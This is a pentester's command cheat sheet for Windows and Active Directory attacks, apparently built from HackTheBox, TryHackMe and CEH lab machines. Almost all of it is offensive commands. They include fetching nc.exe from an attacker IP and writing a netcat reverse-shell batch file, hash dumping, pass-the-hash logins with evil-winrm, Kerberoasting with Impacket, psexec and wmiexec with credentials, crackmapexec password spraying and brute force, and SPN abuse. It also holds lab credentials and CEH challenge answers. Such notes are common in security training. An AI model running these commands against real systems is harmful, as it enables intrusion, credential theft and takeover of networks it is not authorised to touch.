===========[[[[Win Tools +]]]]]]]]]]]]]]]]]]]====================================
rdesktop -u admin -p password 10.10.193.154
xfreerdp /u:wade /p:parzival /v:10.0.2.24
apt install remmina
hashdump
volatility -f SILO-20180105-221806.dmp windows.hashdump.Hashdump
get-content user.txt | Measure-Object -Character
curl 10.10.14.17/nc.exe -o nc.exe
echo nc.exe -e cmd 10.10.14.17 9001 > payload.bat
tcpdump -i tun0 icmp -v
Get-LocalUser
grep -i 7.12 Web.config
PS C:\Program Files\NSClient++> Remove-Item alias:curl
netstat -ano | findstr LIST

#win permission
icacls hello.py /grant hacker:F
icacls C:\temp\LaZagne.exe /grant Everyone:F

#Command Execution with cmd and powershell
powershell -c "ping 10.10.14.17"
cmd.exe /c "ping 10.10.14.17"

#If whoami not working use this
echo %USERPROFILE%
$env:USERNAME

#.Net version check
reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP"

#Hidden files view(ps)
dir -force

#user password change as admin
net user administrator password123

#find local.txt or user.txt
dir "\local.txt" /s
dir "\users.txt" /s
Get-ChildItem -Path C:\ -Filter user.txt -Recurse -ErrorAction SilentlyContinue -Force
#Check all user .txt file and history
dir /s *.txt

#Finding build.ps1 script
powershell -executionpolicy bypass -Command "Get-ChildItem -Path C:\ -Include *build.ps1* -File -Recurse -ErrorAction SilentlyContinue"

#Win PATH
echo %PATH%
set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

#There is another drive?
wmic logicaldisk get deviceid, volumename, description

#Win task list and kill
tasklist
tasklist /v | findstr 2820
taskkill /im:chisel.exe /f

========================================================================================================
=========[[[[AD +]]]]]]]]]]]]]]]]]]]====================================================================
[[[smbclient +]]]]]]
#Let's try to login Users
smbclient -W active.htv -U SVC_TGS //active.htb/Users
smbclient //10.10.10.248/Users -U Tiffany.Molina%NewIntelligenceCorpUser9876
#Share find with authentication
smbclient -L -U [Domain\]Username[%Password]
smbclient -L //10.10.229.184/ -U spookysec.local/svc-admin%management2005
smbmap -u svc-admin -p management2005 -d . -H 10.10.229.184   

[[#LDAP Enum]]
ldapsearch -H ldap://support.htb -x -s base namingcontexts
ldapsearch -H ldap://support.htb -x -b "DC=support,DC=htb"
ldapsearch -H ldap://support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" | grep -B10 -A5 info
#Or use ldapdomaindump
ldapdomaindump -u support.htb\\ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' support.htb -o ldap
cat domain_users.json | grep -A5 info

[[#Kerbrute]]
kerbrute userenum -d intelligence.htb --dc 10.129.163.131 usernames
#PowerView
.  .\PoserView.ps1

========================================================================================================
[[[[[[[[[[[evil-winrm]]]]]]]]]]]]]]]]]
evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434

#Login with hash
#administrator hash look like:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
evil-winrm -i 10.10.229.184 -u administrator -H 0e0363213e37b94221497260b0bcb4fc

========================================================================================================
[[[[[[[[#Impacket +]]]]]]]
#Dumpt TGT
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
#Psexec
psexec.py active.htb/Administrator:Ticketmaster1968@active.htb
psexec.py administrator@active.htb
#wmiexec.py
wmiexec.py 'search.htb/tristan.davies:P@ssw0rd!'@10.10.11.129

#Get all users
impacket-GetADUsers -all -dc-ip 10.10.11.173 support.htb/ldap:'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
#Add an SPN to maria's account as bloodhound suggested
Set-DomainObject -Identity maria -SET @{serviceprincipalname='nonexistent/ALEX'}
#Check maria serviceprincipalname
Get-DomainUser maria

========================================================================================================
[[[[[[[[[[[[[crackmapexec +]]]]]]]]]]]]]]]]]]]
#Most Used
crackmapexec winrm 10.10.10.203 -u users.txt -p passwords.txt
crackmapexec winrm 10.10.10.203 -u users.txt -p passwords.txt --no-bruteforce
crackmapexec winrm 10.10.10.203 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success

crackmapexec smb 10.10.10.203
crackmapexec smb 10.10.10.203 --users
crackmapexec smb 10.10.10.203 --shares
crackmapexec smb intelligence.htb -u allusers -p 'NewIntelligenceCorpUser9876'
crackmapexec smb intelligence.htb -u Tiffany.Monina -p passwords.txt
crackmapexec smb intelligence.htb -u Tiffany.Molina -p 'NewIntelligenceCorpUser9876' --shares
----------------------------------------------------------------------------------------------
crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987'
#Users
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --users
#Groups
crackmapexec smb 192.168.1.105  -u 'Administrator' -p 'Ignite@987' --groups
#Text files
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --spider C\$ --pattern txt
#Log Files
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --spider C\$ --pattern log
#Shares
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --shares
#Sessions
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --sessions
#Password Policies
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --pass-pol
#Drives
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --disks

#Bruteforce: 
#Username
crackmapexec smb 192.168.1.0/24 -u "kavish" "Administrator" -p "Ignite@987"
#Password
crackmapexec smb 192.168.1.0/24 -u "Administrator" -p "password1" "password2" "Ignite@987"

#Dictionary Attack
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt
========================================================================================================
[[[[[[[[CEH Engage Style +]]]]]]]
-------------------------------------------
Challenge 1:
Perform LDAP enumeration on the target network and find out how many user accounts are associated with the domain
=8

#FQDN: AdminDept.CEHORG.com
ldapsearch -x -h 10.10.10.25 -b "DC=CEHORG,DC=com" "objectclass=user" cn #Old version
ldapsearch -H ldap://10.10.10.25 -x -b "DC=CEHORG,DC=com" "objectclass=user" cn #New version
#See only the Domain-related users field
-------------------------------------------
Challenge 2:
Perform an LDAP Search on the Domain Controller machine and find out the version of the LDAP protocol.
=LDAPv3

ldapsearch -h 10.10.10.25 -x -s base namingcontexts #Old version
ldapsearch -H ldap://10.10.10.25 -x -s base namingcontexts #New version
-------------------------------------------
Challenge 3:

-------------------------------------------
Challenge 4:
